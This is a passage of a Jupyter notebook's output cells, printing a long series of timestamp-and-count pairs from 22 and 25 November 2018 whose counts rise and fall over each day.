"['2018-11-22 08:46:22.287979', 4]\n",
"['2018-11-22 08:50:10.039621', 3]\n",
"['2018-11-22 08:51:47.146620', 4]\n",
"['2018-11-22 08:52:38.448735', 3]\n",
"['2018-11-22 08:53:49.763483', 4]\n",
"['2018-11-22 08:55:03.730670', 5]\n",
"['2018-11-22 08:55:17.095817', 6]\n",
"['2018-11-22 08:55:42.870729', 7]\n",
"['2018-11-22 08:56:35.066757', 6]\n",
"['2018-11-22 08:57:19.189101', 7]\n",
"['2018-11-22 09:00:08.632490', 6]\n",
"['2018-11-22 09:00:13.286970', 7]\n",
"['2018-11-22 09:00:44.600227', 8]\n",
"['2018-11-22 09:01:23.592890', 6]\n",
"['2018-11-22 09:01:37.600377', 5]\n",
"['2018-11-22 09:02:06.580712', 6]\n",
"['2018-11-22 09:03:59.561740', 7]\n",
"['2018-11-22 09:04:23.561055', 8]\n",
"['2018-11-22 09:05:07.434409', 9]\n",
"['2018-11-22 09:05:31.375960', 10]\n",
"['2018-11-22 09:05:45.328259', 9]\n",
"['2018-11-22 09:06:07.441895', 7]\n",
"['2018-11-22 09:08:04.742468', 6]\n",
"['2018-11-22 09:08:09.964108', 7]\n",
"['2018-11-22 09:08:11.197315', 8]\n",
"['2018-11-22 09:08:33.579216', 9]\n",
"['2018-11-22 09:08:54.945085', 8]\n",
"['2018-11-22 09:10:22.895250', 9]\n",
"['2018-11-22 09:10:28.790340', 10]\n",
"['2018-11-22 09:10:31.757536', 9]\n",
"['2018-11-22 09:12:10.760158', 10]\n",
"['2018-11-22 09:13:10.687793', 9]\n",
"['2018-11-22 09:13:41.681715', 8]\n",
"['2018-11-22 09:15:31.465191', 9]\n",
"['2018-11-22 09:16:00.072819', 8]\n",
"['2018-11-22 09:16:22.987630', 9]\n",
"['2018-11-22 09:16:54.096916', 8]\n",
"['2018-11-22 09:17:45.894760', 7]\n",
"['2018-11-22 09:18:17.933812', 6]\n",
"['2018-11-22 09:19:13.002601', 5]\n",
"['2018-11-22 09:20:19.455032', 4]\n",
"['2018-11-22 09:22:20.822047', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 09:27:21.676399', 4]\n",
"['2018-11-22 09:42:07.341817', 1]\n",
"['2018-11-22 09:47:23.053508', 2]\n",
"['2018-11-22 09:49:40.105453', 3]\n",
"['2018-11-22 09:51:18.474855', 4]\n",
"['2018-11-22 09:55:44.389614', 1]\n",
"['2018-11-22 09:56:46.448728', 2]\n",
"['2018-11-22 09:56:49.941784', 3]\n",
"['2018-11-22 09:56:58.846986', 4]\n",
"['2018-11-22 09:58:00.239164', 5]\n",
"['2018-11-22 09:59:19.135295', 6]\n",
"['2018-11-22 10:01:36.096688', 4]\n",
"['2018-11-22 10:01:41.180709', 5]\n",
"['2018-11-22 10:02:55.202341', 4]\n",
"['2018-11-22 10:04:06.717500', 5]\n",
"['2018-11-22 10:04:41.850574', 6]\n",
"['2018-11-22 10:05:35.671132', 7]\n",
"['2018-11-22 10:06:38.782622', 5]\n",
"['2018-11-22 10:07:00.051297', 6]\n",
"['2018-11-22 10:09:08.893575', 4]\n",
"['2018-11-22 10:09:25.781727', 5]\n",
"['2018-11-22 10:09:50.897327', 6]\n",
"['2018-11-22 10:10:31.163369', 7]\n",
"['2018-11-22 10:10:32.060779', 8]\n",
"['2018-11-22 10:12:49.064475', 7]\n",
"['2018-11-22 10:14:49.194444', 6]\n",
"['2018-11-22 10:15:04.366695', 5]\n",
"['2018-11-22 10:15:45.084242', 4]\n",
"['2018-11-22 10:16:09.083474', 3]\n",
"['2018-11-22 10:16:15.989536', 4]\n",
"['2018-11-22 10:16:51.938015', 5]\n",
"['2018-11-22 10:19:22.764188', 4]\n",
"['2018-11-22 10:21:02.124386', 3]\n",
"['2018-11-22 10:23:34.071437', 2]\n",
"['2018-11-22 10:29:34.520379', 3]\n",
"['2018-11-22 10:30:24.090653', 4]\n",
"['2018-11-22 10:30:24.879693', 5]\n",
"['2018-11-22 10:32:43.805264', 6]\n",
"['2018-11-22 10:34:29.966760', 3]\n",
"['2018-11-22 10:37:48.608019', 2]\n",
"['2018-11-22 10:38:02.160591', 1]\n",
"['2018-11-22 10:38:06.147720', 2]\n",
"['2018-11-22 10:38:50.233397', 3]\n",
"['2018-11-22 10:38:55.120716', 4]\n",
"['2018-11-22 10:39:02.448362', 5]\n",
"['2018-11-22 10:43:48.662731', 2]\n",
"['2018-11-22 10:44:08.960310', 3]\n",
"['2018-11-22 10:47:42.781130', 4]\n",
"['2018-11-22 10:54:19.252593', 3]\n",
"['2018-11-22 10:54:40.363298', 4]\n",
"['2018-11-22 10:57:45.617015', 5]\n",
"['2018-11-22 11:01:27.181592', 6]\n",
"['2018-11-22 11:02:23.277004', 4]\n",
"['2018-11-22 11:03:06.856215', 5]\n",
"['2018-11-22 11:04:50.710731', 6]\n",
"['2018-11-22 11:04:53.579321', 7]\n",
"['2018-11-22 11:04:56.801610', 6]\n",
"['2018-11-22 11:05:40.964096', 7]\n",
"['2018-11-22 11:05:58.905965', 8]\n",
"['2018-11-22 11:06:05.971352', 9]\n",
"['2018-11-22 11:06:37.451351', 8]\n",
"['2018-11-22 11:07:08.517138', 7]\n",
"['2018-11-22 11:07:59.640473', 8]\n",
"['2018-11-22 11:08:30.715716', 9]\n",
"['2018-11-22 11:08:41.894004', 10]\n",
"['2018-11-22 11:08:48.263730', 11]\n",
"['2018-11-22 11:09:04.573968', 12]\n",
"['2018-11-22 11:09:24.550383', 11]\n",
"['2018-11-22 11:09:48.470166', 10]\n",
"['2018-11-22 11:09:56.432088', 11]\n",
"['2018-11-22 11:10:03.362631', 10]\n",
"['2018-11-22 11:11:02.044217', 11]\n",
"['2018-11-22 11:12:25.005241', 10]\n",
"['2018-11-22 11:12:35.775049', 11]\n",
"['2018-11-22 11:12:54.587888', 9]\n",
"['2018-11-22 11:13:01.536450', 10]\n",
"['2018-11-22 11:14:11.757738', 9]\n",
"['2018-11-22 11:15:04.989977', 8]\n",
"['2018-11-22 11:16:04.953901', 9]\n",
"['2018-11-22 11:16:54.103765', 10]\n",
"['2018-11-22 11:17:16.404007', 9]\n",
"['2018-11-22 11:17:53.956117', 8]\n",
"['2018-11-22 11:19:41.657177', 7]\n",
"['2018-11-22 11:20:29.614631', 6]\n",
"['2018-11-22 11:20:53.993003', 7]\n",
"['2018-11-22 11:21:30.614046', 6]\n",
"['2018-11-22 11:22:01.635267', 5]\n",
"['2018-11-22 11:24:04.656597', 4]\n",
"['2018-11-22 11:24:17.214986', 3]\n",
"['2018-11-22 11:24:58.677385', 2]\n",
"['2018-11-22 11:29:47.636319', 1]\n",
"['2018-11-22 11:45:36.548706', 2]\n",
"['2018-11-22 11:47:14.225998', 3]\n",
"['2018-11-22 11:49:06.331554', 4]\n",
"['2018-11-22 11:49:18.484064', 5]\n",
"['2018-11-22 11:49:39.292678', 6]\n",
"['2018-11-22 11:49:49.284711', 7]\n",
"['2018-11-22 11:52:10.622952', 6]\n",
"['2018-11-22 11:53:59.941412', 3]\n",
"['2018-11-22 11:54:13.709475', 4]\n",
"['2018-11-22 11:55:32.604471', 3]\n",
"['2018-11-22 11:57:22.020750', 4]\n",
"['2018-11-22 11:57:26.741427', 5]\n",
"['2018-11-22 12:00:21.958711', 6]\n",
"['2018-11-22 12:00:29.402072', 7]\n",
"['2018-11-22 12:00:54.199062', 8]\n",
"['2018-11-22 12:01:30.721918', 7]\n",
"['2018-11-22 12:01:37.750576', 8]\n",
"['2018-11-22 12:01:54.504382', 9]\n",
"['2018-11-22 12:02:23.705199', 10]\n",
"['2018-11-22 12:02:29.618755', 11]\n",
"['2018-11-22 12:04:19.340852', 12]\n",
"['2018-11-22 12:04:48.814452', 11]\n",
"['2018-11-22 12:04:57.454467', 10]\n",
"['2018-11-22 12:05:09.120611', 9]\n",
"['2018-11-22 12:05:17.876684', 10]\n",
"['2018-11-22 12:06:08.221882', 9]\n",
"['2018-11-22 12:06:34.391970', 5]\n",
"['2018-11-22 12:07:47.628381', 6]\n",
"['2018-11-22 12:08:03.035325', 7]\n",
"['2018-11-22 12:09:04.065899', 6]\n",
"['2018-11-22 12:09:09.783690', 5]\n",
"['2018-11-22 12:09:12.089747', 6]\n",
"['2018-11-22 12:09:13.762455', 7]\n",
"['2018-11-22 12:09:17.906602', 6]\n",
"['2018-11-22 12:09:25.093844', 7]\n",
"['2018-11-22 12:11:16.024801', 8]\n",
"['2018-11-22 12:11:42.036494', 9]\n",
"['2018-11-22 12:12:00.507708', 8]\n",
"['2018-11-22 12:13:04.875822', 7]\n",
"['2018-11-22 12:14:08.946345', 6]\n",
"['2018-11-22 12:15:48.502250', 5]\n",
"['2018-11-22 12:15:55.830376', 6]\n",
"['2018-11-22 12:17:42.580436', 4]\n",
"['2018-11-22 12:21:17.322875', 3]\n",
"['2018-11-22 12:23:21.817294', 2]\n",
"['2018-11-22 12:23:30.178417', 3]\n",
"['2018-11-22 12:28:21.441296', 2]\n",
"['2018-11-22 12:28:53.167391', 3]\n",
"['2018-11-22 12:31:34.982547', 2]\n",
"['2018-11-22 12:32:03.427247', 3]\n",
"['2018-11-22 12:32:04.684273', 4]\n",
"['2018-11-22 12:32:05.526583', 5]\n",
"['2018-11-22 12:34:49.242881', 4]\n",
"['2018-11-22 12:37:52.660144', 2]\n",
"['2018-11-22 12:37:55.453496', 3]\n",
"['2018-11-22 12:37:56.553849', 4]\n",
"['2018-11-22 12:38:32.885875', 5]\n",
"['2018-11-22 12:42:59.408822', 1]\n",
"['2018-11-22 12:49:33.662847', 2]\n",
"['2018-11-22 12:50:18.631586', 3]\n",
"['2018-11-22 12:52:20.450725', 4]\n",
"['2018-11-22 12:52:36.961611', 5]\n",
"['2018-11-22 12:53:09.434370', 6]\n",
"['2018-11-22 12:53:13.246185', 7]\n",
"['2018-11-22 12:53:28.932382', 8]\n",
"['2018-11-22 12:54:24.810111', 9]\n",
"['2018-11-22 12:54:54.922067', 8]\n",
"['2018-11-22 12:55:11.728747', 9]\n",
"['2018-11-22 12:55:43.075112', 10]\n",
"['2018-11-22 12:55:48.330839', 11]\n",
"['2018-11-22 12:56:28.124436', 12]\n",
"['2018-11-22 12:56:45.454007', 13]\n",
"['2018-11-22 12:57:30.778168', 12]\n",
"['2018-11-22 12:57:33.715659', 13]\n",
"['2018-11-22 12:58:19.631760', 11]\n",
"['2018-11-22 12:59:38.353901', 10]\n",
"['2018-11-22 13:00:06.165303', 11]\n",
"['2018-11-22 13:00:16.532782', 12]\n",
"['2018-11-22 13:00:40.415334', 9]\n",
"['2018-11-22 13:01:22.282460', 7]\n",
"['2018-11-22 13:01:39.375872', 5]\n",
"['2018-11-22 13:02:30.125385', 6]\n",
"['2018-11-22 13:02:30.639555', 7]\n",
"['2018-11-22 13:02:57.642411', 6]\n",
"['2018-11-22 13:03:55.617290', 7]\n",
"['2018-11-22 13:04:21.323415', 6]\n",
"['2018-11-22 13:04:26.983643', 7]\n",
"['2018-11-22 13:04:48.417031', 8]\n",
"['2018-11-22 13:05:41.691413', 9]\n",
"['2018-11-22 13:06:35.411924', 8]\n",
"['2018-11-22 13:07:36.810025', 7]\n",
"['2018-11-22 13:08:39.553024', 5]\n",
"['2018-11-22 13:11:14.993247', 2]\n",
"['2018-11-22 13:12:54.657817', 1]\n",
"['2018-11-22 13:14:33.838002', 2]\n",
"['2018-11-22 13:14:45.873352', 3]\n",
"['2018-11-22 13:17:14.160006', 4]\n",
"['2018-11-22 13:17:40.740439', 5]\n",
"['2018-11-22 13:28:41.518466', 1]\n",
"['2018-11-22 13:39:30.425895', 2]\n",
"['2018-11-22 13:40:47.150283', 3]\n",
"['2018-11-22 13:43:01.693944', 4]\n",
"['2018-11-22 13:43:02.807838', 5]\n",
"['2018-11-22 13:45:06.797245', 6]\n",
"['2018-11-22 13:47:06.569356', 5]\n",
"['2018-11-22 13:47:24.148449', 6]\n",
"['2018-11-22 13:48:38.781336', 5]\n",
"['2018-11-22 13:49:09.803606', 4]\n",
"['2018-11-22 13:51:40.607138', 5]\n",
"['2018-11-22 13:51:49.867282', 4]\n",
"['2018-11-22 13:54:14.675855', 5]\n",
"['2018-11-22 13:56:24.482585', 6]\n",
"['2018-11-22 13:56:25.270884', 7]\n",
"['2018-11-22 13:56:33.125180', 8]\n",
"['2018-11-22 13:56:48.855751', 9]\n",
"['2018-11-22 13:56:55.714242', 10]\n",
"['2018-11-22 13:58:35.472557', 9]\n",
"['2018-11-22 13:59:50.125607', 10]\n",
"['2018-11-22 14:00:15.654618', 11]\n",
"['2018-11-22 14:00:37.312658', 10]\n",
"['2018-11-22 14:00:51.742606', 11]\n",
"['2018-11-22 14:00:57.225779', 9]\n",
"['2018-11-22 14:01:08.685841', 8]\n",
"['2018-11-22 14:02:03.641519', 7]\n",
"['2018-11-22 14:03:16.634287', 8]\n",
"['2018-11-22 14:03:56.197383', 7]\n",
"['2018-11-22 14:04:28.342580', 6]\n",
"['2018-11-22 14:05:36.742733', 7]\n",
"['2018-11-22 14:06:23.382243', 8]\n",
"['2018-11-22 14:06:48.706768', 9]\n",
"['2018-11-22 14:07:35.690414', 8]\n",
"['2018-11-22 14:08:35.690787', 7]\n",
"['2018-11-22 14:08:54.001910', 6]\n",
"['2018-11-22 14:10:08.736174', 7]\n",
"['2018-11-22 14:10:31.035410', 6]\n",
"['2018-11-22 14:10:32.574331', 7]\n",
"['2018-11-22 14:11:00.862600', 5]\n",
"['2018-11-22 14:13:14.147642', 6]\n",
"['2018-11-22 14:13:22.521414', 7]\n",
"['2018-11-22 14:14:55.639181', 8]\n",
"['2018-11-22 14:17:16.951996', 9]\n",
"['2018-11-22 14:18:01.592549', 8]\n",
"['2018-11-22 14:19:14.949164', 9]\n",
"['2018-11-22 14:19:32.060764', 8]\n",
"['2018-11-22 14:20:47.720020', 5]\n",
"['2018-11-22 14:20:51.110942', 6]\n",
"['2018-11-22 14:23:52.133283', 5]\n",
"['2018-11-22 14:25:36.201885', 3]\n",
"['2018-11-22 14:27:20.341397', 2]\n",
"['2018-11-22 14:40:30.179963', 1]\n",
"['2018-11-22 14:40:31.851510', 2]\n",
"['2018-11-22 14:40:32.897222', 3]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 14:42:40.786179', 4]\n",
"['2018-11-22 14:43:48.421694', 5]\n",
"['2018-11-22 14:43:54.701535', 6]\n",
"['2018-11-22 14:44:36.873368', 5]\n",
"['2018-11-22 14:44:42.765645', 3]\n",
"['2018-11-22 14:45:31.319397', 4]\n",
"['2018-11-22 14:49:28.390802', 3]\n",
"['2018-11-22 14:49:54.720142', 4]\n",
"['2018-11-22 14:50:48.407054', 3]\n",
"['2018-11-22 14:51:20.599469', 4]\n",
"['2018-11-22 14:51:26.235453', 5]\n",
"['2018-11-22 14:51:34.058680', 6]\n",
"['2018-11-22 14:52:44.489990', 7]\n",
"['2018-11-22 14:53:16.620652', 8]\n",
"['2018-11-22 14:54:00.890871', 7]\n",
"['2018-11-22 14:54:15.521265', 8]\n",
"['2018-11-22 14:54:29.892133', 9]\n",
"['2018-11-22 14:54:30.207510', 10]\n",
"['2018-11-22 14:54:32.701396', 11]\n",
"['2018-11-22 14:55:24.841128', 12]\n",
"['2018-11-22 14:56:21.449150', 13]\n",
"['2018-11-22 14:57:27.538684', 12]\n",
"['2018-11-22 14:58:02.026581', 11]\n",
"['2018-11-22 14:58:21.117452', 12]\n",
"['2018-11-22 14:58:37.904317', 10]\n",
"['2018-11-22 14:59:22.683335', 11]\n",
"['2018-11-22 14:59:36.757972', 10]\n",
"['2018-11-22 14:59:40.651045', 11]\n",
"['2018-11-22 15:00:21.231918', 10]\n",
"['2018-11-22 15:01:21.666091', 9]\n",
"['2018-11-22 15:01:27.691585', 8]\n",
"['2018-11-22 15:01:30.731399', 9]\n",
"['2018-11-22 15:03:20.173373', 8]\n",
"['2018-11-22 15:03:28.387284', 9]\n",
"['2018-11-22 15:03:29.054858', 10]\n",
"['2018-11-22 15:03:51.358937', 11]\n",
"['2018-11-22 15:03:55.329986', 12]\n",
"['2018-11-22 15:04:37.833155', 13]\n",
"['2018-11-22 15:05:15.030869', 14]\n",
"['2018-11-22 15:05:19.217748', 15]\n",
"['2018-11-22 15:05:22.768497', 14]\n",
"['2018-11-22 15:05:40.386313', 15]\n",
"['2018-11-22 15:06:59.578585', 14]\n",
"['2018-11-22 15:06:59.786971', 15]\n",
"['2018-11-22 15:07:29.359931', 16]\n",
"['2018-11-22 15:07:30.206732', 15]\n",
"['2018-11-22 15:07:55.264093', 13]\n",
"['2018-11-22 15:07:59.379783', 14]\n",
"['2018-11-22 15:08:19.468301', 13]\n",
"['2018-11-22 15:09:07.530946', 11]\n",
"['2018-11-22 15:09:11.284579', 12]\n",
"['2018-11-22 15:09:15.265250', 11]\n",
"['2018-11-22 15:09:21.179728', 10]\n",
"['2018-11-22 15:11:02.192741', 9]\n",
"['2018-11-22 15:11:26.478318', 10]\n",
"['2018-11-22 15:11:59.974506', 8]\n",
"['2018-11-22 15:12:30.615300', 7]\n",
"['2018-11-22 15:15:31.463678', 6]\n",
"['2018-11-22 15:16:06.444211', 7]\n",
"['2018-11-22 15:16:49.267053', 6]\n",
"['2018-11-22 15:18:11.300050', 5]\n",
"['2018-11-22 15:19:03.732974', 6]\n",
"['2018-11-22 15:19:34.278400', 5]\n",
"['2018-11-22 15:21:14.291026', 4]\n",
"['2018-11-22 15:36:44.530272', 1]\n",
"['2018-11-22 15:36:49.002086', 2]\n",
"['2018-11-22 15:43:47.635129', 3]\n",
"['2018-11-22 15:45:34.212798', 4]\n",
"['2018-11-22 15:48:04.058107', 3]\n",
"['2018-11-22 15:49:06.962968', 4]\n",
"['2018-11-22 15:50:08.560650', 3]\n",
"['2018-11-22 15:50:15.068227', 4]\n",
"['2018-11-22 15:50:34.231014', 5]\n",
"['2018-11-22 15:51:33.504994', 6]\n",
"['2018-11-22 15:53:09.593128', 5]\n",
"['2018-11-22 15:53:50.623718', 6]\n",
"['2018-11-22 15:53:50.753090', 7]\n",
"['2018-11-22 15:53:54.137353', 8]\n",
"['2018-11-22 15:55:07.887858', 9]\n",
"['2018-11-22 15:56:02.506900', 10]\n",
"['2018-11-22 15:56:25.760780', 11]\n",
"['2018-11-22 15:57:00.536404', 12]\n",
"['2018-11-22 15:57:07.289687', 11]\n",
"['2018-11-22 15:58:09.589883', 10]\n",
"['2018-11-22 15:58:33.744166', 8]\n",
"['2018-11-22 15:59:36.650107', 7]\n",
"['2018-11-22 16:01:01.228618', 6]\n",
"['2018-11-22 16:01:33.334595', 4]\n",
"['2018-11-22 16:02:58.057050', 5]\n",
"['2018-11-22 16:03:00.616058', 6]\n",
"['2018-11-22 16:03:07.221733', 7]\n",
"['2018-11-22 16:03:26.551241', 6]\n",
"['2018-11-22 16:03:30.877979', 7]\n",
"['2018-11-22 16:03:38.144725', 8]\n",
"['2018-11-22 16:03:40.955119', 9]\n",
"['2018-11-22 16:03:59.815034', 10]\n",
"['2018-11-22 16:04:25.671601', 9]\n",
"['2018-11-22 16:05:01.267243', 8]\n",
"['2018-11-22 16:06:18.370186', 9]\n",
"['2018-11-22 16:06:58.362547', 8]\n",
"['2018-11-22 16:07:32.886745', 7]\n",
"['2018-11-22 16:08:06.645031', 5]\n",
"['2018-11-22 16:08:38.101056', 4]\n",
"['2018-11-22 16:12:44.130563', 5]\n",
"['2018-11-22 16:13:11.617854', 6]\n",
"['2018-11-22 16:17:00.805116', 5]\n",
"['2018-11-22 16:18:26.794795', 3]\n",
"['2018-11-22 16:19:21.184983', 4]\n",
"['2018-11-22 16:20:17.468125', 5]\n",
"['2018-11-22 16:20:24.350528', 6]\n",
"['2018-11-22 16:20:32.563718', 7]\n",
"['2018-11-22 16:20:37.529576', 8]\n",
"['2018-11-22 16:22:09.547059', 9]\n",
"['2018-11-22 16:22:11.112770', 10]\n",
"['2018-11-22 16:25:36.953020', 8]\n",
"['2018-11-22 16:39:36.545667', 1]\n",
"['2018-11-22 16:48:39.801475', 2]\n",
"['2018-11-22 16:54:33.007480', 1]\n",
"['2018-11-22 16:58:03.356275', 2]\n",
"['2018-11-22 16:58:43.321561', 3]\n",
"['2018-11-22 16:58:47.839429', 4]\n",
"['2018-11-22 16:59:22.924916', 5]\n",
"['2018-11-22 17:00:00.679985', 6]\n",
"['2018-11-22 17:00:55.913896', 7]\n",
"['2018-11-22 17:01:04.132468', 8]\n",
"['2018-11-22 17:01:54.158030', 9]\n",
"['2018-11-22 17:02:56.780906', 7]\n",
"['2018-11-22 17:06:06.266128', 6]\n",
"['2018-11-22 17:06:21.449005', 7]\n",
"['2018-11-22 17:06:56.297944', 8]\n",
"['2018-11-22 17:07:09.227634', 9]\n",
"['2018-11-22 17:07:42.380965', 10]\n",
"['2018-11-22 17:07:59.836618', 9]\n",
"['2018-11-22 17:08:03.255082', 10]\n",
"['2018-11-22 17:10:35.685285', 9]\n",
"['2018-11-22 17:12:13.810732', 3]\n",
"['2018-11-22 17:13:38.336977', 4]\n",
"['2018-11-22 17:14:16.869723', 5]\n",
"['2018-11-22 17:17:10.482941', 4]\n",
"['2018-11-22 17:18:30.783338', 5]\n",
"['2018-11-22 17:18:42.952324', 6]\n",
"['2018-11-22 17:21:29.359556', 4]\n",
"['2018-11-22 17:23:09.725226', 2]\n",
"['2018-11-22 17:28:05.240866', 1]\n",
"['2018-11-22 17:39:29.357223', 2]\n",
"['2018-11-22 17:41:42.558972', 3]\n",
"['2018-11-22 17:43:37.947521', 4]\n",
"['2018-11-22 17:45:08.307989', 5]\n",
"['2018-11-22 17:46:03.776884', 6]\n",
"['2018-11-22 17:47:48.826005', 7]\n",
"['2018-11-22 17:48:45.380272', 6]\n",
"['2018-11-22 17:49:45.789272', 7]\n",
"['2018-11-22 17:51:00.314163', 8]\n",
"['2018-11-22 17:52:00.392452', 7]\n",
"['2018-11-22 17:53:32.927277', 8]\n",
"['2018-11-22 17:53:40.494815', 7]\n",
"['2018-11-22 17:53:59.827308', 8]\n",
"['2018-11-22 17:54:03.485699', 9]\n",
"['2018-11-22 17:54:25.892919', 8]\n",
"['2018-11-22 17:55:32.036627', 9]\n",
"['2018-11-22 17:55:46.443583', 8]\n",
"['2018-11-22 17:58:23.651140', 7]\n",
"['2018-11-22 17:58:48.795630', 8]\n",
"['2018-11-22 17:58:49.645343', 9]\n",
"['2018-11-22 17:59:19.274300', 10]\n",
"['2018-11-22 17:59:29.745735', 11]\n",
"['2018-11-22 18:00:49.511656', 10]\n",
"['2018-11-22 18:00:56.171303', 11]\n",
"['2018-11-22 18:01:03.569386', 12]\n",
"['2018-11-22 18:01:10.471330', 13]\n",
"['2018-11-22 18:01:37.634341', 14]\n",
"['2018-11-22 18:02:48.665107', 13]\n",
"['2018-11-22 18:02:52.397337', 12]\n",
"['2018-11-22 18:03:08.520782', 11]\n",
"['2018-11-22 18:04:02.045063', 10]\n",
"['2018-11-22 18:04:17.107832', 11]\n",
"['2018-11-22 18:04:49.506236', 12]\n",
"['2018-11-22 18:05:13.737443', 11]\n",
"['2018-11-22 18:06:04.104827', 8]\n",
"['2018-11-22 18:06:12.080019', 7]\n",
"['2018-11-22 18:08:00.267892', 8]\n",
"['2018-11-22 18:08:34.748976', 9]\n",
"['2018-11-22 18:09:41.366830', 8]\n",
"['2018-11-22 18:09:58.479123', 9]\n",
"['2018-11-22 18:10:58.495075', 8]\n",
"['2018-11-22 18:12:37.643226', 3]\n",
"['2018-11-22 18:13:33.605536', 4]\n",
"['2018-11-22 18:17:02.650381', 3]\n",
"['2018-11-22 18:21:51.668544', 1]\n",
"['2018-11-22 18:26:36.931175', 2]\n",
"['2018-11-22 18:39:54.134230', 1]\n",
"['2018-11-22 18:43:04.769099', 2]\n",
"['2018-11-22 18:50:57.265593', 1]\n",
"['2018-11-22 18:52:04.894740', 2]\n",
"['2018-11-22 18:53:03.934821', 3]\n",
"['2018-11-22 18:55:04.043878', 2]\n",
"['2018-11-22 19:01:03.217272', 1]\n",
"['2018-11-22 19:01:32.045727', 2]\n",
"['2018-11-22 19:03:35.273474', 3]\n",
"['2018-11-22 19:04:32.308037', 4]\n",
"['2018-11-22 19:04:43.437441', 5]\n",
"['2018-11-22 19:07:56.159656', 4]\n",
"['2018-11-22 19:08:28.148791', 3]\n",
"['2018-11-22 19:10:17.581551', 4]\n",
"['2018-11-22 19:10:20.815614', 5]\n",
"['2018-11-22 19:10:35.622879', 6]\n",
"['2018-11-22 19:11:51.194968', 7]\n",
"['2018-11-22 19:12:04.100417', 8]\n",
"['2018-11-22 19:12:19.349843', 9]\n",
"['2018-11-22 19:14:20.379838', 10]\n",
"['2018-11-22 19:14:24.271864', 11]\n",
"['2018-11-22 19:15:07.976014', 10]\n",
"['2018-11-22 19:15:15.056950', 11]\n",
"['2018-11-22 19:15:23.102067', 10]\n",
"['2018-11-22 19:15:47.879392', 11]\n",
"['2018-11-22 19:16:07.478103', 10]\n",
"['2018-11-22 19:16:13.152799', 9]\n",
"['2018-11-22 19:18:44.487070', 7]\n",
"['2018-11-22 19:18:54.260740', 6]\n",
"['2018-11-22 19:19:37.575665', 7]\n",
"['2018-11-22 19:21:54.035099', 8]\n",
"['2018-11-22 19:22:59.770351', 7]\n",
"['2018-11-22 19:23:33.762433', 6]\n",
"['2018-11-22 19:24:32.986735', 5]\n",
"['2018-11-22 19:26:23.757861', 3]\n",
"['2018-11-22 19:49:41.226910', 1]\n",
"['2018-11-22 19:50:01.268934', 2]\n",
"['2018-11-22 19:50:53.985484', 3]\n",
"['2018-11-22 19:53:54.027647', 2]\n",
"['2018-11-22 19:55:28.149216', 3]\n",
"['2018-11-22 19:55:46.466462', 4]\n",
"['2018-11-22 19:56:02.318793', 5]\n",
"['2018-11-22 19:58:03.340405', 4]\n",
"['2018-11-22 20:05:17.113251', 5]\n",
"['2018-11-22 20:06:05.239102', 4]\n",
"['2018-11-22 20:07:58.421590', 5]\n",
"['2018-11-22 20:09:07.054019', 6]\n",
"['2018-11-22 20:09:18.727101', 5]\n",
"['2018-11-22 20:09:21.811786', 6]\n",
"['2018-11-22 20:09:37.390395', 7]\n",
"['2018-11-22 20:09:50.994495', 6]\n",
"['2018-11-22 20:10:05.084964', 7]\n",
"['2018-11-22 20:11:21.584595', 8]\n"
]
},
{
"name": "stdout",
"output_type": "stream",
"text": [
"['2018-11-22 20:13:00.425772', 9]\n",
"['2018-11-22 20:13:52.116924', 8]\n",
"['2018-11-22 20:14:22.435206', 7]\n",
"['2018-11-22 20:16:15.295371', 6]\n",
"['2018-11-22 20:17:23.984622', 5]\n",
"['2018-11-22 20:18:28.212449', 4]\n",
"['2018-11-22 20:19:13.119820', 5]\n",
"['2018-11-22 20:20:45.290465', 4]\n",
"['2018-11-22 20:22:52.278177', 3]\n",
"['2018-11-22 20:26:51.725141', 4]\n",
"['2018-11-22 20:27:30.456936', 3]\n",
"['2018-11-22 20:27:34.862284', 4]\n",
"['2018-11-22 20:32:47.979118', 5]\n",
"['2018-11-22 20:33:50.578589', 4]\n",
"['2018-11-22 20:38:04.820707', 1]\n",
"['2018-11-22 20:45:48.731063', 2]\n",
"['2018-11-22 20:47:22.739768', 3]\n",
"['2018-11-22 20:51:40.739600', 4]\n",
"['2018-11-22 20:52:40.755568', 3]\n",
"['2018-11-22 20:57:14.728286', 4]\n",
"['2018-11-22 20:57:15.845270', 5]\n",
"['2018-11-22 20:58:04.167585', 6]\n",
"['2018-11-22 20:58:23.539696', 7]\n",
"['2018-11-22 21:00:30.415355', 6]\n",
"['2018-11-22 21:00:52.632447', 7]\n",
"['2018-11-25 05:11:44.815401', 1]\n",
"['2018-11-25 05:28:56.855213', 2]\n",
"['2018-11-25 06:14:54.013778', 1]\n",
"['2018-11-25 06:37:58.031474', 2]\n",
"['2018-11-25 06:43:17.891556', 1]\n",
"['2018-11-25 06:55:49.428055', 2]\n",
"['2018-11-25 06:56:26.497993', 3]\n",
"['2018-11-25 07:00:00.621544', 2]\n",
"['2018-11-25 07:00:06.410847', 3]\n",
"['2018-11-25 07:01:33.301785', 4]\n",
"['2018-11-25 07:03:08.000826', 5]\n",
"['2018-11-25 07:03:10.032806', 6]\n",
"['2018-11-25 07:03:17.426077', 7]\n",
"['2018-11-25 07:03:41.345195', 8]\n",
"['2018-11-25 07:05:04.994113', 7]\n",
"['2018-11-25 07:05:47.277192', 6]\n",
"['2018-11-25 07:06:27.034563', 7]\n",
"['2018-11-25 07:07:37.629414', 6]\n",
"['2018-11-25 07:10:06.313016', 3]\n",
"['2018-11-25 07:10:53.003088', 2]\n",
"['2018-11-25 07:11:15.092422', 3]\n",
"['2018-11-25 07:15:25.281496', 2]\n",
"['2018-11-25 07:19:06.067103', 1]\n",
"['2018-11-25 07:21:56.269691', 2]\n",
"['2018-11-25 07:22:02.966089', 3]\n",
"['2018-11-25 07:22:26.998178', 4]\n",
"['2018-11-25 07:23:06.620259', 3]\n",
"['2018-11-25 07:33:02.755690', 1]\n",
"['2018-11-25 07:36:59.150406', 2]\n",
"['2018-11-25 07:37:00.885503', 3]\n",
"['2018-11-25 07:37:39.290070', 4]\n",
"['2018-11-25 07:37:59.592295', 5]\n",
"['2018-11-25 07:42:00.796368', 4]\n",
"['2018-11-25 07:45:06.971049', 3]\n",
"['2018-11-25 07:45:52.470247', 4]\n",
"['2018-11-25 07:46:05.445053', 5]\n",
"['2018-11-25 07:46:33.366903', 4]\n",
"['2018-11-25 07:46:54.525708', 5]\n",
"['2018-11-25 07:49:55.229297', 4]\n",
"['2018-11-25 07:50:41.449042', 5]\n",
"['2018-11-25 07:50:57.609307', 6]\n",
"['2018-11-25 07:51:20.354465', 5]\n",
"['2018-11-25 07:51:26.494055', 4]\n",
